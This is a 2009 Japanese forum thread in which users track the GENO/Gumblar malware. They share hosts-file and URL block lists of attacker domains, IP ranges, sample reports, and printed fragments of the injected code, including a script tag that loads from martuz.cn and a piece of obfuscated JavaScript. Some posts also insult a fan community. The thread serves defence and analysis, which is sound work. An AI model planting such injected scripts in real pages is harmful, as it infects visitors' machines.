たとえばデータの保存をネットワークドライブでしてて、ローカルをログイン毎に初期化するなら大丈夫かもしれん

>>594
現時点でその手の報告は無いが亜種がまだ作られてるようだし、
ウィルス対策ベンダーとかで挙動解析終了報告等上がって無いから０とは言えん

>>595
ﾏﾃﾏﾃ、ウェブブラウズ専用PCだというに。再起動してBSODになったら即座にHDDフォーマット→再インストールで良い

>>594
俺の知るかぎり現時点ではそういう報告は無いし、現状ではそういう動作をしない
（1件あるがどう解釈しても酷く信憑性に欠ける内容の為除外）

ニコニコの毎時ランキングが103％だったが、どーなんだろ。
他は大丈夫のようだが。

>>591
その質問の意図がわからない。

>>599
JSが複雑なほど％が高くなる傾向にある
ランキングなんかスクリプトめちゃくちゃ複雑なんだろうな。
そういうわけでソース見ないことには…

ソースざっとみたところ妙なコードは混じってなかったな

>>601-602
そうかぁ。お手数おかけして申し訳ない。
一応、使用者も多いところだし、報告しておかないと、と思って。

低スペッコPCなんでFlashPlayer10.0.22.87と最終更新日が一緒の
9.0.159.0をつかってるんだが10系に更新したほうがいいのかえ？

なんか、各ウイルスソフトの更新の間隔が短くなったような気がするのだが
情報集めてるのかな？

スレやまとめにある感染確認してみたところ異常なし判定のライン
その後readerやflashの最新版をインスコして再起動したらBSOD発動
再度まとめを回って確認したものの現段階での感染は確認できず
>>5を見ると再起動でBSODになるのはケーブル抜いたときみたいなので
繋がったまま再起動でBSODは別件と見ていいんだろうか…
詳しく分かる人がいたらセフかアウか教えてほしい
一応ウイルスチェックはした、ソフトはESET Smart　結果は感染無し
現段階で確認できた異常はBSCD以外にはなし

こいつってウイルス自体を更新してるみたいだけど
20万台を一斉に発動させるなんて出来るのかな？
それが狙いならかなりヤバイ組織がサイバーテロるーとか
何かくれないとＦ５攻撃しちゃうぞーみたいに動いたりすんのか・・・

アンチソフトやWinUpDataだって自動更新するぞ？

いやなんかこう
アジャムヒンなんたらみたいのが国防総省にわーっと
やっちゃうとか妄想すると結構楽しいじゃん・・・

mixiやられたら終わるな

ｕｋｏｋｋｅｉと出版社どうなった？

>>607
ｳｨｷﾍﾟﾃﾞｨｱでボットネットを検索しろｗ

あじゃむひん？？

どうなった？って見に行って確かめておいでよ

>>609
妄想するのも楽しそうだがbotnetでググってくるといい

>>600
セキュリティホールってのが「セキュリティ対策を万全にしたはずなのに抜けてるところ」
を指しているのならば、あなたが潰したのは「セキュリティホールだったもの」に過ぎない。

本当のセキュリティーホールってのは、今回あなたが潰しそこなったところにある（かもしれない）。
だとするならば安心するのは早い、という事。


以上エスパーでした。

まあ、セキュリティーホールってのは逃げ水みたいなものなんだよ、とエスパー追加。

>>491
hosts書き換えようとすると

「ファイルC:\Windows\System32\drivers\etc\デスクトップ\hostsを作成できません
パスおよびファイル名が正しいか確認してください」

と出るんだけど構わず名前をつけて保存しちゃって良いの？

>>614
hostsファイルに読み取り専用属性がついてるんじゃないか？
右クリック→プロパティで読み取り専用のチェック外してから、開いて編集して保存でどうよ？
あと、念のために元の状態のhostsファイルをどっかにバックアップしておこうな

>>606
BSCDとはなんぞや？
検出するかどうかはESETが対応してるかどうかでしょうよ
>>1のまとめ見て判断しようぜ

俺のはetc\hostsなんだが
etc\デスクトップ\hostsなんてことがあるのか

転載の天才

553 名前： ムレスズメ(catv?) 投稿日： 2009/05/19(火) 05:04:12.14 ID:uzMMFCCh
>>547

転載
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

>ScanSafe
>Google SERPs Redirections Turn to Bots
>のレポート、および
>gumblar.exe -- ThreatExpert
>の実ファイル解析により、
>GumblarはIRCもしくは何か別のものによる Botnet 命令待機を行っている可能性が高くなりました。
>（中略）
>感染者は内部汚染ファイルを自動更新させられる危険性があります。

相手が本気出したら即死の可能性あるよ

>>615
ありがとうございます。読み取り専用になってました
これって書き換えた後は読み取り専用に戻しておいたほうがいいですか？

>>617
>>491に従ってデスクトップにコピペしたんで

ちなみに、こんなとこ使ってないからスカスカのテキストが開くと思ってたら
Spybotが使ってたらしくビッチリ登録されててびびったｗ

>>6>>7
の通りやって
正常値だったら問題なしですか？

>>620
自分で判断する癖を付けましょう
あなたが求めている情報はすでに出揃っているはずです

○○すれば安心ですか？問題ないですか？みたいな質問に対する回答は
「自分で判断しろ」と「はいはい安心デスヨー」のどちらがいいのだろう

こういう質問する人って本当のことが知りたいのではなく、たとえ間違っていても
「自分が望む答え」が欲しいだけだからテキトーに答えて追い返した方が得策なのか

どんなに守りを固めても安心は永遠に来ないと真実を告げる

>>622
「セキュリティに完璧」は有り得ません。

腐女子さん達もう嫌だ・・

まだ全然わかってない奴が居るんだけどさぁ、そいつらは感染したら自業自得って事にてもいいよね？

事にて→×
事にして→〇


吊ってくる

532 ： クンシラン(アラバマ州) [sage] ：2009/05/19(火) 03:04:45.34 ID:L1oEc3bK
hostsファイルに(ry
127.0.0.1 martuz.cn
127.0.0.1 zlkon.lv
127.0.0.1 findyourbigwhy.cn
127.0.0.1 bigtopsuper.cn
127.0.0.1 gumblar.cn
127.0.0.1 jii.be
127.0.0.1 zief.pl
127.0.0.1 litefront.cn


533 ： クンシラン(アラバマ州) [sage] ：2009/05/19(火) 03:09:11.38 ID:L1oEc3bK
avastのwebシールド(URLブロック)に
*martuz.cn*
*zlkon.lv*
*findyourbigwhy.cn*
*bigtopsuper.cn*
*gumblar.cn*
*jii.be*
*zief.pl*
*litefront.cn*
過剰反応っぽいが、細かい事は気にするな

V速で拾ってきたんだが、ドメイン増えた？
あと有効ならこっちでもテンプレ化してほしい

>>625
なんだかわからんが乙

上の方でも言われてるけど海外のサイト
危険度高いな

CNN　72%

ABCNEWS　107%

FOX NEWS　203%

今あるウイルスチェッカーって
「黒判定だけど白だった」っていう誤判定はあるけど
「白判定だけど黒だった」っていう誤判定はある？

なんぼでもある

>>629
感染していないのにそんな判定出したら
まずいだろ、朝日新聞も９０パーだったぞ。
NIfの二の舞をを避けるためにも
もっと精度を上げないと。

>>627
また増えたのか?
鯖に増えられるとIP焼きでも間に合わんな

さっき試しに感染サイトへアクセスしたら785.exeってのをtempにダウンロードしたよ
これがたぶん元凶か

C:\DOCUME~1\ユーザー\LOCALS~1\Temp\785.exe

>>633
全部>>463にあるIPアドレス範囲だわ

>>635
�d�d
ドメインだけ増えた？　どちらにしろhostsは追加だな
avastのwebシールドってのも
このスレじゃあんまり触れられてなかった気がするが色々出てくるね

いちお貼っておく
これ以外は既出だと思うので省略

Non-authoritative answer:
Name: jii.be
Address: 78.159.114.177

Non-authoritative answer:
Name: zief.pl
Address: 221.5.74.38

Non-authoritative answer:
Name: litefront.cn
Addresses: 91.212.41.110, 91.212.41.111, 91.212.41.96

自鯖じゃない奴等には関係ないし今更な話だけどさ
FTP鯖止めてしまえば取り敢えず外部から改竄は出来ないな
自鯖だけどメインPC共有ですーとか鯖がWindowsですーとか言う場合は知らん

>>637
IPレンジでは
78.159.112.0/22
221.5.0.0/17
91.212.41.0/24
になるっぽい

Windowsでも普通にIISでFTP停止できるべ。

なんか同人スレ観てたらJSオフにしても感染する亜種出たとか書き込んでるんだけど
そんなヤバいの確認できたの？あの子達はどんな書き込みでも信じるの？

もうびびって携帯でしかネットしてないんだけど
USBがGENOウイルスを媒介することはある？
学校のPCが信用できない……
まとめとかにかいてあったらごめん

>>641
低年齢化してるらしいから

おい＋100するのやめろ。janeで見れないだろが

なんかこのスレだか前スレだかで
javaスクリプト無効に失敗したSP2の同人の人の書き込みなかったっけ？
それが尾ひれついてんじゃない。
もう同人の人のことは放っておいて良いんじゃないかな。
なんでそんなに構うのかわからない。

>>641
同人板の人たちは
アンチソフトがあんまり対応してないし亜種が常に出ているから
完全に防ぐことは現状では無理です！

って言って、アップデートよりあんまり閲覧しない事とかを優先させてたくらいだからなあ
嘘でなければ大袈裟紛らわしいはおkみたいな
警戒するに越したことはないってことなのかね

>>645
それなら良いんだけどね、JS切っても感染とか相当ヤバいと思っただけ

>>646
把握した、ビックリして損した

あっちを見てみた限りセキュ板とかにいる釣りが頑張ってるくさいから
あまり気にしない方がよさそう

なんかどこのスレでもスレヲチしたがる奴いるけど何がしたいんだ？

万が一の最悪の事態を想定して警戒しているんだろう
妄想のプロフェッショナル集団だからきっとそれも凄いんだろう

最初の頃は見てたが、疲れて今はもう見て無いから実際は知らん
もしかしたらホントに亜種でてんのかもしれね

>>635
テンプレセキュリティサイトに感謝しろよｗ
そして、それを貼ったオレにもｗｗ

腐女子が最低な人種だと分かった

寝起きだからかJSってみて女子小学生を思い浮かべた俺は快調だな

>>646
あんまりアレゲな質問が多くて
おめえそんなレベルならネサフしないほうがいいよマジ…ってなってるだけだよ
まとめ嫁で終わらない所だからだ

>>654
感染経路が女子小学生だと…！？

ネット弁慶は脳内の発言で済ませとけ
2ちゃんねらは目糞と歯糞ほどしか違わん

同人連中みたいに日常的にネット使うのにテンプレで分からんってのは同情の余地無し
ただ、時々ネットでmixi(笑)やらようつべ見る程度の一般人はadobeってなに？って状態だからな・・・
なんというか、知識より先にネットが普及しすぎだと思う

>>657
セキュリティスレ荒らしまわってた腐女子ちゃんか？
図星つかれて顔真っ赤なのかい？

せっかく有意義なスレなんだから

>>653
前スレ

960 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 15:02:13 ID:8q4bxpc+0
>>951
ありがとう！

昨日半年ぶりくらいにログインしたmixiにGENOの事書いたら
腐の方達からすごい質問攻め
「自分もよく解らないのでまとめwiki見たほうがいいですよ」と返信したら
二人程から
「なら書くな！」
と

泣いていい？

963 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 15:05:24 ID:k2CI1leb0
>>960
なんかよくわからんが、存分に泣くがいい。

964 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 15:05:43 ID:gw0F+TVl0
>>960
ｗｗｗ

965 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 15:07:07 ID:xKJ07MeN0
>>960
怖いのう怖いのう

966 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 15:08:01 ID:wU1qChfhP
>>960の人気に嫉妬

967 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 15:08:46 ID:t3VCyTRM0
>>960
一緒に泣いてやるよ

970 名前：192.168.0.774[sage] 投稿日：2009/05/18(月) 15:10:37 ID:ImVScTUk0
　　　　　　　○
　　　　　　　ノ|）
　　＿|￣|○ <し
　　　　↑
　　　>>960

マジでこんな人多いみたいよ。
わからないなら回線切って窓からry

リンク集に昨日追加したサイトでgeocitiesのところなんだが、
チェッカー通すと0％なのにソース見ると黒っぽいのがある。
詳しい方のチェックをお願いしたい。

cmd.exeが動かなくなるってのはそもそもウイルス作者の想定した状況ではたぶんなくて
ウイルスインストール時に動くu.batがダメな終わり方をするせいで
cmd.exeがhookされたまま応答できなくなるってだけらしい

なのでver upされた最近のタイプではcmd.exeは動いて普通
cmd.exeが動くかどうか、ってのは感染の判断としては全く無意味になってると思うよ

>>661のやつ
俺もmixiにGENOの事書いたけど
詳しく書かずに不安な人は落ち着くまでネットにつながないことですね
って書いておいた

腐っぽい人が結構読みに来てたわｗ

基礎的なこともわかんない、調べない、努力しない人には回線切っとけが一番良策でしょうな

割れadobe製品使ってるからアップデートしないって同人絵描きが多数居るってマジか
救いようがねえな

割れ厨で情弱で自己中とか腐女子ってもう、どうしようもねえな

>>666
それだけは否定させてほしい……
大体はペンタブに付いてくるエレメンツ
もしくはアカデミックなんとか
多分だけど

叩きレスは同人オチスレ辺りでやって欲しいさ

まだどう化けるかわからんヤツだし
一つはマトモなスレ残そうぜ
俺のＰＣの為にさ

>>668
多分がついたら逆効果
帰れｗ

yuuno●sakura●ne●jp
漫画家のサイト
チェッカーで1000％なんだけど既出？

>>665
これを機に　とか思う人が少ないのかねぇ
今回の事が落ち着いたらそれで終わり　みたいなのが多そう

>>672
全員とは言わないが、多くが今回のことでも対策しないまま、
また次の脅威に晒されるのは目に見えてますな

>>671
まだ、ソース見て
感染しているかどうか確かめないと。

Gumblaroidなんて名前にしても
検索されにくいので、GENOウィルスでいいじゃん。

>>666
それは本当。
でも最近は昔に比べればかなりマシになってる。

荒れるような書き込みしといてあれだけど、
このスレの人に迷惑掛かるからこれ以上荒れるような書き込みするのやめようぜ

ネ実板の方は、以前の垢ハックウイルスで学習していて
今回のことはそのくらいの対策普段から当然とか余裕たっぷりだったな

ソース見てもかなりやばそうだね
難読化されたjavascriptなんて全部黒でいいっしょ

>>671
今見に行ったら</head>と<body>の間に難読化されたjavasrciptが埋め込まれてた。
難読スクリプトを読み解く能力無いけど、たぶん黒

他のソースが綺麗にかかれてるのに、挿入されてるところだけ違和感ある書き方。

>>671
感染してる

いまリストに放り込みました。
ヲチスレの弗。インデックスはきれいですがTOPその他は黒いと思います。

亜種でクレカの情報抜くヤツが出たらｵﾜﾀだな

>>671
判定黒

>>662
genocitiesって、武蔵のとこ？
見に行く場所がわからないと調べようが無い

>>683
ちょｗ綴り

>>641
何回か諌めたけどいつも「でも亜種が出たらどうするんだ」という奴が出てくるｗ
亜種はどのウイルスにもあるだろうよｗ

皆殺し都市ｋｔｋｒ

>>671含め、黒と断定出来たURLはこちらへどうぞ
http://genolists.alink.uic.to/

チェッカーの精度も最近疑問視されてるから
できればJS切ったFxで直接手動でソース確認した方がいいね
まぁ自分も難読化されたJSコード読み解く能力はないので、見た目での判断だけになるけど

しかしそうなるとますます地道な作業だから、なかなかリスト増えないなｗ

>>682
亜種も何も、現行のでもう抜かれてても全然おかしくないぞ
何してるのかすらまだ完全にはわかってないウイルスなんだ

噂に尾ひれがつきすぎて
何のウイルスかちゃんと知ってる人とか少なそうだな

>>671をリンク集に追加しときました。

個人の対策は、２ｃｈや纏めサイトで何とかなるけど
サイト側のほうは、企業側が働きかけてくれないと
なかなかはかどらない。

>>689
そんなの知らなくても、対策だけしっかりしてれば普通は十分だろ

>>683
リンク集の感染疑い(未確認)に入ってる、個人サイト。
コメント欄にアドレス書いてるよ。

なんか同人サイトの感染探しはヲチスレの方で進んでるみたいだけど

>>667
精神病も追加して

セキュ板から逃げてきた('A`)
なんだよあそこ

http://www.broadband-xp.com/hidesource/escape.html
難読化（escape）処理された文字列はここで複合出来る。

あとは replace 関数を適当に読めば元のJavascriptが判る。

昨日の夜から23469や41470ポートのアタックが頻発してるんだけど
GENOのボットコマンドじゃないのかな

聖帝♂♂検索はサイト止めた。

>>693
そのサイト空のHTMLかと思いきやjavaスクリプトonにすると見れるの今気付いた
とりあえずトップと01menu.htmlは感染してはいないな

>>694
話が堂々巡りになって結局進んでない記がする…

http://www.alexa.com/search?q=gumblar.cn

alexaの人気サイトに絶賛ランクイン中ｗ　現在588,338位
martuz.cnはランク外だな

martuz.cn、gumblar.cn、zlkon.lv、これ以降の最新サーバって何か判明してる？
最新はmartuz.cnでおｋ？

>>699
なら自分の早とちりだったわけか。申し訳ない。
確認してくれてありがとう。

>>701
>>627

>>700
初めて知った奴らが脊髄反射で「〜するにはどうしたら」「〜ですが大丈夫ですか」
とかしてレス数無駄に消費する傾向にあるからなぁ・・・

>>693,699
変な難読化されたjavascriptが埋め込まれてる。
けど、全然タイプが違う
文字コード変換みたいなコード

>>703
おぉサンクス
一応alexaで全部確認してみたら、いまだアクセスがお盛んなのはmartuz.cnとgumblar.cnだな
まぁalexaが全てを把握してるわけじゃないけどｗ　目安程度には使えるｗ

>>671
ここもmartuz.cnに飛ぶんだな
"<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>"

■GENOウィルスのチェックプログラム(簡易版)を書いてみた
Vista使いでUAC厨の私には全く関係の無い話のような気がするが、
いつUACを突破する亜種が出るかは分からない。
sqlsodbc.chmのファイルサイズで判定できるようなので、
そんなときのためにこんなバッチファイルを書いてみた。
以下のプログラムをテキストファイルにコピペして、
拡張子をbatにしてダブルクリックで実行すれば、
コマンドを勝手に実行し、最後にレポート書いて停止するものだ。
有効利用してください。
あと、バッチに関しては素人なので改造してくれるとうれしいなぁ。

以下略。

>>705
普通のサイトのhtmlを難読化してあって
javaスクリプトをonにしていない人はサイトを閲覧できないようにしてある

株式会社アイマジックのページに対処法が載ってたので参考になれば
ttp://www.imagic.co.jp/info090514.html

感染確認プログラムってニーズあるのかな…っていうのは、案外反応が薄い ここだけ見てる限り

>>710
精度の高いプログラムは必要。
チェッカーは、どこまで正確だかわからない。

URLぶちこむとソースを簡単に見られる、ってだけのシンプルなヤツが一番使えるような

うｐされてもリンク先が怖くて踏めないｗ

vmで感染してみよっと

malzillaというの使ってソース見てる

>>710
ニーズあるでしょ。ただ、検出精度が絶対でないから
反応が薄いんだと思う

>>712
だなぁ、欲を言えば難読化でよく使われる文の辺りに色付けして貰えりゃOK

DSiのブラウザーとソース表示のブックマークレットを使って確認してる。

>>717
理想的ですね

body の直前で unescape と eval が入ってて変数名が大文字小文字混じり
これでいいと思う

テンプレ適当にいろんなスレに張った方がいいかな

>>721
中身がどうだろうが、コピペ多投は2chにとっては基本迷惑行為＝規制されても文句言えないだからやめとけ

>>707,712
あと、先日から言われてました「Javascriptの勝手埋め込みによるトロイ」が、
指定のページに埋まっていたら赤くなる判定機能も付けました。

ひまぐらま「ポートちぇき」再開（仮設へ引越し）のお知らせ
ttp://blog.livedoor.jp/hpg/archives/50479373.html

>>723
ソースちぇき(β版) - ひまぐらま[別館]
ttp://hpg2.me.land.to/srcchk1.html

あなたのホームページを 「ソースちぇき(β版)」 で 見てみよう
このページでは、アナタが指定したアドレス(ページ)を
あなたのパソコンに代わって取得し、ココに表示します。
ページの内容を、ただのHTMLソース(文字列)として表示しますので、
もしもJavascriptによるいたづらが仕組まれていても安心です。

あとオマケですが、表示するソースの中から、
『見ただけで感染する？ウイルス(Zlkon/Gumblar/Martuzなど)』 を
自動的に探して太字にする機能も付いてるので、
もし覚えの無いJavascriptが在れば、
そのページのソースファイルを、自分で直してみると良いかもしれません。

※この「ソースちぇき」では発見のお手伝いだけで、
実際にソースを手直しなどするのは管理者であるあなた自身です。

「ソースちぇき」は単に客観的にあなたのホームページを見て、
ソースを表示するだけの「簡易ソースチェッカー」です。

トロイ診断機能は、hpgの憶測によるカンタンな正規表現による検索に過ぎません
のであしからず(ﾟДﾟ)ｽﾏﾝﾈ

あなたの回線環境やサーバの混み具合によっては1分以上かかることがありますので
リロードしないでね(´・ω・)ｵﾈｶﾞｲ

こういうとき1CD linuxって便利だな
HDD外して光学ドライブだけにしてやれば絶対感染しないもんな

その昔BIOSに感染する（ｒｙ

>>726
ああ昔はあったね
最近のﾏﾏﾝは大丈夫

>>724
気軽に使えんがなｗｗ

JSなしで感染する亜種が出たかどうかは知らんが
原理的にはJSなしでも感染する

ブラウザのjsとPDFのjsは分けないとダメだろ

>>712
シンプルなのなら
view-source:これをURLの頭につければソース表示するぞ

ソースソース言っても感染したPCでアップしても何の解決にもならんよな
知識ない人はISPに電話して理由説明して自サイトのファイル全削除してもらった方が早いし確実だ
それから自分のPCのクリーンインスコ

>>634
exe拾ったなら、検体提出スレに持ち込んでくれないだろうか。検体くれー。

【鑑定目的禁止】検出可否報告スレ10
ttp://pc11.2ch.net/test/read.cgi/sec/1235459712/
【鑑定目的禁止】検出可否報告スレ11
ttp://pc11.2ch.net/test/read.cgi/sec/1242606390/

>>720
>>166

ところで大手ニュースサイトでまもとに扱ってるとこってSo-netセキュリティ以外にある？
Yahooとか触れもしてないよな？

セキュ板の方はもう駄目だな・・・ウィルスコードなんぞに質問殺到してる

今北産業
>>724
www.mikesquarter・com　完全にクロだけど検出しないね

(function(){var Fs6A='%';var vRjd=',76,61r,20,61,3d,22S,63,72ip,74Engine,22
,2c,62,3d,22,56e,72sion,28),2b,22,2c,6a,3d,2

>>737
その文書くなよｗ
またAvastがーとか煩いのが沸くんだから…

セキュ板はゲハと同じでメーカー間の罵り合いがメインみたいなもんだ

>>735
http://headlines.yahoo.co.jp/hl?a=20090514-00000010-maiall-sci
http://headlines.yahoo.co.jp/hl?a=20090515-00000013-zdn_ep-sci

＞735
日経ITproが少し。他はスラッシュドットジャパンくらい。

他所の板のことぐちぐち言うぐらいなら書き込み自重して欲しい、と思ってる人もいる

>>731
Firefoxのソース表示って画面右端で折り返ししないから見づらくてどうも
でもコレが一番楽だね。ツール開発者さんの鯖に負担もかけないし

>>732
ソースソースってのは閲覧したいサイトが安全か確認するためとか
疑惑のあったサイトを確認するために先にソース表示って話じゃないの？

>>737
完全にはチェックできないから
試しに使ってみる程度でいいじゃない？

これで全てのトロイ系ウイルスが見つかるの？
見つかりません。全然見つかりません。
これはホームページのHTMLソースチェッカーです。
JSRedir-R（Zlkon/Gumblar/Martuz）の判定はあくまでもオマケです。

>>744
自分はそのつもりで話しておりました

>735
itmedia･日経BPが多少

>>745
ですなw

やっぱ一番突っ込んで書いてるのはSo-netだけか
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1890
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884

ヘアーサロンジョイってもう対応済み？
コードが無いみたいなんだけど。

ttp://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/?ST=security

日本以外だと、どのニュースサイトが取り上げてる？

>>750
無いですね、ガセだったのか？

>>753
いえ、昨日はトロイが検出されてました
詳しくはみてませんが

>>749
GENO自体じゃなくてGENOによるサイト改ざん情報ならいくらでもあるが

取り上げるなら、どこどこが感染してましたのでそこを見た人は感染してる疑いがあります、ってはっきり書かないと意味ないよな
だから二次感染が広がるんだろう

英ソフォス
ttp://www.sophos.com/blogs/gc/g/2009/05/14/malicious-jsredir-javascript-biggest-malware-threat-web/

超やっつけ
http://end.if.land.to/geno.php?url=http://www.mikesquarter.com

フォームとかは作ってないから自分でurl書き換えて
ソース
http://end.if.land.to/geno.phps

ノートン
　ttp://www.symantec.com/norton/security_response/writeup.jsp?docid=2009-051900-3410-99

http://news.google.com/news/search?um=1&ned=jp&hl=ja&q=%E4%B8%8D%E6%AD%A3%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B9+%E6%94%B9%E3%81%96%E3%82%93

>>755
それは有志による情報でしょ？
そんなん見てるのごく一部
Yahooクラスの大手ニュースサイトが具体的な感染サイトを掲載しないと意味がない

>>743
ViewSourceWith もしくは WebDeveloper を使えば、
好きなテキストエディタでソースを開けるぞ。

>>759
ノートン先生仕事したのか。
書いてある事からするとﾄﾞﾛｯﾊﾟ(難読化スクリプト)じゃなくて本体のほうだね
他のベンダーもこれに続いてくれると良いんだが

>>463の書式が統一されていなかったのでやってみた

58.65.232.0 - 58.65.239.255　58.65.232.0/21
61.139.0.0 - 61.139.127.255　61.139.0.0/17
61.219.39.0 - 61.219.39.255　61.219.39.0/24
61.235.117.0 - 61.235.117.255　61.235.117.0/24
61.237.236.0 - 61.237.236.255　61.237.236.0/24
63.146.2.0 - 63.146.2.255　63.146.2.0/24
69.46.0.0 - 69.46.31.255　69.46.0.0/19
74.220.215.0-74.220.215.255　74.220.215.0/24
78.109.16.0 - 78.109.31.255　78.109.16.0/20
78.159.112.0 - 78.159.115.255　78.159.112.0/22
82.146.48.0 - 82.146.55.255　82.146.48.0/21
83.68.16.0 - 83.68.16.255　83.68.16.0/24
85.12.43.0 - 85.12.43.255　85.12.43.0/24
85.14.6.0 - 85.14.6.255　　85.14.6.0/24
85.17.0.0 - 85.17.255.255　85.17.0.0/16
85.214.90.0 - 85.214.90.255　85.214.90.0/24
91.211.64.0 - 91.211.65.255　91.211.64.0/23
91.212.41.0 - 91.212.41.255　91.212.41.0/24
91.212.65.0 - 91.212.65.255　91.212.65.0/24
91.212.41.0- 91.212.41.255　91.212.41.0/24
91.212.41.0 - 91.212.41.255　91.212.41.0/24
94.232.248.0 - 94.232.255.255　94.232.248.0/21
94.229.64.0 - 94.229.79.255　94.229.64.0/20
94.247.2.0 - 94.247.3.255　94.247.2.0/23
194.165.4.0 - 194.165.5.255　194.165.4.0/23
195.2.252.0 - 195.2.253.255　195.2.252.0/23
195.216.160.0 - 195.216.191.255　195.216.160.0/19
206.44.0.0 - 206.44.255.255　206.44.0.0/16
209.44.100.0 - 209.44.100.255　209.44.100.0/24
209.44.126.0 - 209.44.126.255　209.44.126.0/24
209.62.7.0 - 209.62.7.255　209.62.7.0/24
209.102.247.0 - 209.102.247.255　209.102.247.0/24
209.250.241.0 - 209.250.241.255　209.250.241.0/24
209.205.192.0 - 209.205.223.255　209.205.192.0/19
209.205.224.0 - 209.205.239.255　209.205.224.0/20
211.90.0.0 - 211.97.255.255　211.90.0.0/15 & 211.92.0.0/14 & 211.96.0.0/15
213.182.192.0 - 213.182.223.255　213.182.192.0/19
218.90.0.0 - 218.94.255.255　218.90.0.0/15 & 218.92.0.0/15 & 218.94.0.0/16
78.159.112.0 - 78.159.115.255　78.159.112.0/22
221.5.0.0 - 221.5.127.255　221.5.0.0/17
91.212.41.0 - 91.212.41.255　91.212.41.0/24
95.129.144.0 - 95.129.144.255　95.129.144.0/24
95.129.145.0 - 95.129.145.255　95.129.145.0/24

メモ帳でタブ等に置き換えられるように範囲とCIDRとの間は全角スペースにしてる

ちょい報告、ガイシュツだったらすまん。

全ての対策をおこなったPCでGENO感染したサイトを訪問
　↓
avast!が遮断
　↓
念のためavast!およびカスペ・バスターのオンラインでフルスキャン
　↓
C:\WINDOWS\system32内に「system32.exe」が作成されているのを発見
　↓
「system32.exe」の更新日時は2005年だが、作成日時はGENO感染サイト訪問時
　↓
ヒューリスティック予測で「system32.exe」の疑わしい挙動を検出


とりあえず「system32.exe」は除去したが、まだ何かが潜んでいそうだ。
おまえらもC:\WINDOWS\system32を調べてみれ
ちなみに既知の「system32.exe」を作るワームとは別物。

未感染PCではSystem32.exeは存在しないな

素人質問ですみません
ずっと疑問に思ってたことなんですが
ブラウザのJavascriptを切りさえすれば
他の対策は取っていなかったとしても
ウィルスのJavascriptはJavascriptなんだから
機能しないものなんじゃないんですか？

NoScript導入してるのにScript実行されてマジ焦ったｗｗｗｗｗｗｗｗｗｗｗｗｗ

あるページで○○.comを許可、その状態で裏にしてた
上に出てた漫画化のページクリック、裏にいた火狐起動でもNoScriptのブロック画面が出ない…
ソース見たら黒…

これ一体どういうことなんだろ？NoScriptはどっか一時的に許可すると他のまで許可されちゃうの？

でもReader8にFlash未導入環境だったの思い出して安心してる…大丈夫だよね…

>>765
うちのにはいなかった（踏んでないから当然か）
それは検出したの？

ウチの未感PCにもsystem32.exe存在せず

>>769
avast、カスペ、バスターは検出できなかった。
とりあえず検体は各ベンダの送っといた。

>>765
物が残してあるならVirusTotal なりでチェックして結果を。
んで怪しそうなら検体スレ行って検体提供してら

それは前から別なの踏んでたんだと思うよ

>>761
http://news.google.com/news/search?um=1&ned=jp&hl=ja&q=%E4%B8%8D%E6%AD%A3%E3%82%A2%E3%82%AF%E3%82%BB%E3%82%B9+%E6%94%B9%E3%81%96%E3%82%93

現状コードが見当たらないサイト

無地TシャツとオリジナルTシャツの卸売専門店/問屋街

北川大介 トップページのみ白

ペットの姓名判断のサイト
主上支局
livmail

>>768
>NoScriptはどっか一時的に許可すると他のまで許可されちゃうの？
それはないでしょｗ

間違って「すべてのサイトを許可」でも押しちゃったんじゃない？

>>772
VirusTotalを失念していた、すまん。
http://www.virustotal.com/jp/analisis/138404683259a191c78642e22bdaf4ab

結果: 12/40 (30.00%)
カスペもavastも未対応のトロイらしい。

>>776
なんか違ったっぽい？とりあえずもう一度やってみたけど、やっぱし下部にブロックしましたって言うのが出てこない。
NoScriptのアイコンにマウス乗せておくと、きちんとブロックしましたって出たから、問題は無いようだけど気持ちは悪いね

>>777
先生、「受理 2009.04.09 15:27:37」

一月前の結果ですぜ、それｗ

>>759
この挙動の説明だけど、

The Trojan will attempt to delete itself if processes containing the following strings are executed:
* gmer
* le38

The Trojan will attempt to delete itself if a URL that contains the following string is accessed:
DaonolFix

この2つの意味がよくわからん。
gmerや le38ってなにを避けようとしてるんだろ。
DaonolFixってのも今ひとつよくわからない。

system32.exe ってのは、なにしたらでてくるんだろう
しらべてみなければ…。

>>778
設定（オプション）を見直してみるといいよ、すれ違いなんで詳しくは書かないけど
解説してるサイト腐るほどあるしね、今ググるの怖いだろうけどｗ

仮想でmartuz.cn感染させたPCにはsystem32.exeは存在しなかった

>>779
あ、すまんｗ

http://www.virustotal.com/jp/analisis/e3155860dfa57d4cb4fde129360cf184

てことは感染したＰＣにはsystem32.exeが入ってるって事でＦＡ？

お前が理解するのは無理だと思うよ

>>784
system32.exeで検索したらこんなん出てきたぞ？

[ウイルス情報：Win32.Sddrop.D]
http://www.casupport.jp/virusinfo/2004/win32_sddrop_d.htm

[Windows XP を起動すると警告メッセージ "C:\Windows\System32\System32.exe が見つかりません" が表示される]
http://support.microsoft.com/kb/833767/ja

感染してるって事でFAじゃね？

GENO系ウイルス単体で、system32.exe が出現するかは謎が残るものの、
system32.exe などという正規ファイルはNTにはないので、
何かが巣食ってるのはほぼ間違いないといっていいかと

>>787
いや、それは既に見たんだが、それらちは違うみたい。
コードを流用した亜種かもね。

>>785
全ての感染サイトで入ってくるとは限らない。
たまたまGENO感染以前に別途感染していたのかも知れないし。
ただ、自分が感染したのはGENO汚染サイト閲覧時で間違いない。

問題は、avast!で防げない、検出されないってこと。
いまGENO絡みでavast!一辺倒になってる人が多いみたいだからねえ・・・
しかも主要な無料オンラインスキャンでも検出できないという。

見つからないと思ったらここに誤爆ってたorz
ｽﾏｿ

今更ながら、過去の情報を…
当時はReaderが9.1だったが、意図的に9.0を上書きして検体入手を試みた時です。
4/5版を入手した際に、フォルダ移動しようとして、ファイルの上にドラッグして
exeを発動（発動したexeは自己消滅）させた時の挙動。

・新しく生成された34.exeをFWが通信許可求めてきたのでブロック。
・u.batと34.exeが残る状態で捕獲して削除（現行版はe.batだったかな）
